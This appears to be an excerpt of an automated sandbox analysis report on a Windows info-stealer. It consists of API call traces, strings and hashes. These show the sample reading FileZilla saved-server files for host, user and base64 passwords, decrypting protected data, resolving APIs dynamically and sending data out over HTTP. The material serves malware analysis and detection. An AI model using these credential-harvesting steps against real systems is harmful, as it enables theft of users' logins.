                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                                        • String ID:
• API String ID: 2068576380-0
• Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
• Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
• Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
• Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
• HeapAlloc.KERNEL32(00000000), ref: 004143D4
• GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
Memory Dump Source
• Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
Yara matches
Similarity
• API ID: Heap$AllocNameProcessUser
• String ID:
• API String ID: 1206570057-0
• Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
• Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
• Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
• Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
• ExitProcess.KERNEL32 ref: 0040113E
Memory Dump Source
• Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
Yara matches
Similarity
• API ID: ExitInfoProcessSystem
• String ID:
• API String ID: 752954902-0
• Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
• Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
• Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
• Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
• RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
• lstrcat.KERNEL32(?,04407BF0), ref: 004072AB
• lstrcat.KERNEL32(?,?), ref: 004072BF
• lstrcat.KERNEL32(?,?), ref: 004072D3
• lstrcat.KERNEL32(?,?), ref: 004072E7
• lstrcat.KERNEL32(?,04406730), ref: 004072FB
• lstrcat.KERNEL32(?,04406748), ref: 0040730F
• lstrcat.KERNEL32(?,04406688), ref: 00407322
• lstrcat.KERNEL32(?,04406760), ref: 00407336
• lstrcat.KERNEL32(?,04407C78), ref: 0040734A
• lstrcat.KERNEL32(?,?), ref: 0040735E
• lstrcat.KERNEL32(?,?), ref: 00407372
• lstrcat.KERNEL32(?,?), ref: 00407386
• lstrcat.KERNEL32(?,04406730), ref: 00407399
• lstrcat.KERNEL32(?,04406748), ref: 004073AD
• lstrcat.KERNEL32(?,04406688), ref: 004073C1
• lstrcat.KERNEL32(?,04406760), ref: 004073D4
• lstrcat.KERNEL32(?,04407CE0), ref: 004073E8
• lstrcat.KERNEL32(?,?), ref: 004073FC
• lstrcat.KERNEL32(?,?), ref: 00407410
• lstrcat.KERNEL32(?,?), ref: 00407424
• lstrcat.KERNEL32(?,04406730), ref: 00407438
• lstrcat.KERNEL32(?,04406748), ref: 0040744B
• lstrcat.KERNEL32(?,04406688), ref: 0040745F
• lstrcat.KERNEL32(?,04406760), ref: 00407473
• lstrcat.KERNEL32(?,04407D48), ref: 00407486
• lstrcat.KERNEL32(?,?), ref: 0040749A
• lstrcat.KERNEL32(?,?), ref: 004074AE
• lstrcat.KERNEL32(?,?), ref: 004074C2
• lstrcat.KERNEL32(?,04406730), ref: 004074D6
• lstrcat.KERNEL32(?,04406748), ref: 004074EA
• lstrcat.KERNEL32(?,04406688), ref: 004074FD
• lstrcat.KERNEL32(?,04406760), ref: 00407511
• lstrcat.KERNEL32(?,04407DB0), ref: 00407525
• lstrcat.KERNEL32(?,?), ref: 00407539
• lstrcat.KERNEL32(?,?), ref: 0040754D
• lstrcat.KERNEL32(?,?), ref: 00407561
• lstrcat.KERNEL32(?,04406730), ref: 00407574
• lstrcat.KERNEL32(?,04406748), ref: 00407588
• lstrcat.KERNEL32(?,04406688), ref: 0040759C
• lstrcat.KERNEL32(?,04406760), ref: 004075AF
• lstrcat.KERNEL32(?,04407E18), ref: 004075C3
• lstrcat.KERNEL32(?,?), ref: 004075D7
• lstrcat.KERNEL32(?,?), ref: 004075EB
• lstrcat.KERNEL32(?,?), ref: 004075FF
• lstrcat.KERNEL32(?,04406730), ref: 00407613
• lstrcat.KERNEL32(?,04406748), ref: 00407626
• lstrcat.KERNEL32(?,04406688), ref: 0040763A
• lstrcat.KERNEL32(?,04406760), ref: 0040764E
  • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,0041DEB8), ref: 00406FD6
  • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,00000000), ref: 00407018
  • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020, : ), ref: 0040702A
  • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,00000000), ref: 0040705F
  • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,00000000), ref: 004070A3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044036B0), ref: 004077DB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406A18), ref: 004077EE
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(36B6C020), ref: 004077FB
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(36B6C020), ref: 0040780B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3958002797-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 187 40ea90-40eb22 call 416d40 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416da0 call 4093a0 209 40eb27-40eb2c 187->209 210 40ef60-40ef73 call 416e00 call 413220 209->210 211 40eb32-40eb49 call 415530 209->211 211->210 216 40eb4f-40ebaf strtok_s call 416d40 * 4 GetProcessHeap HeapAlloc 211->216 227 40ebb2-40ebb6 216->227 228 40eeca-40ef5b lstrlen call 416da0 call 401500 call 404dc0 call 416e00 memset call 417040 * 4 call 416e00 * 4 227->228 229 40ebbc-40ebcd StrStrA 227->229 228->210 231 40ec06-40ec17 StrStrA 229->231 232 40ebcf-40ec01 lstrlen call 414fa0 call 416ea0 call 416e00 229->232 234 40ec50-40ec61 StrStrA 231->234 235 40ec19-40ec4b lstrlen call 414fa0 call 416ea0 call 416e00 231->235 232->231 239 40ec63-40ec95 lstrlen call 414fa0 call 416ea0 call 416e00 234->239 240 40ec9a-40ecab StrStrA 234->240 235->234 239->240 242 40ecb1-40ed03 lstrlen call 414fa0 call 416ea0 call 416e00 call 4170d0 call 4094a0 240->242 243 40ed39-40ed4b call 4170d0 lstrlen 240->243 242->243 288 40ed05-40ed34 call 416e20 call 416fb0 call 416ea0 call 416e00 242->288 261 40ed51-40ed63 call 4170d0 lstrlen 243->261 262 40eeaf-40eec5 strtok_s 243->262 261->262 274 40ed69-40ed7b call 4170d0 lstrlen 261->274 262->227 274->262 283 40ed81-40ed93 call 4170d0 lstrlen 274->283 283->262 293 40ed99-40eeaa lstrcat * 3 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 416e20 * 4 283->293 288->243 293->262
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                                                                                        • API String ID: 1266801029-555421843
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043EAC98), ref: 00415F11
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043EACB0), ref: 00415F2A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044033B8), ref: 00415F42
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403370), ref: 00415F5A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044032F8), ref: 00415F73
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04402B00), ref: 00415F8B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7800), ref: 00415FA3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7660), ref: 00415FBC
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403298), ref: 00415FD4
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403388), ref: 00415FEC
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044031D8), ref: 00416005
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403358), ref: 0041601D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7920), ref: 00416035
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403430), ref: 0041604E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403418), ref: 00416066
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E77C0), ref: 0041607E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044031A8), ref: 00416097
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403340), ref: 004160AF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7980), ref: 004160C7
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403268), ref: 004160E0
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E79A0), ref: 004160F8
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(044032C8,?,004136C0), ref: 0041610A
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04403178,?,004136C0), ref: 0041611B
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04403328,?,004136C0), ref: 0041612D
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(044033A0,?,004136C0), ref: 0041613F
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(044031C0,?,004136C0), ref: 00416150
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04403148), ref: 00416172
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04403160), ref: 00416193
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04403250), ref: 004161AB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,044031F0), ref: 004161CD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E50000,043E7840), ref: 004161EE
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76E80000,04402B10), ref: 0041620F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00416226
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                                                        • API String ID: 2238633743-2781105232
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,044035D0,?,04407F88,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04403730,00000000,?,044076E0,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00405417
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                                                                        • String ID: ------$"$"$"$--$------$------$------$J&f
                                                                                                                                                                                                                                                                                        • API String ID: 1133489818-3705675087
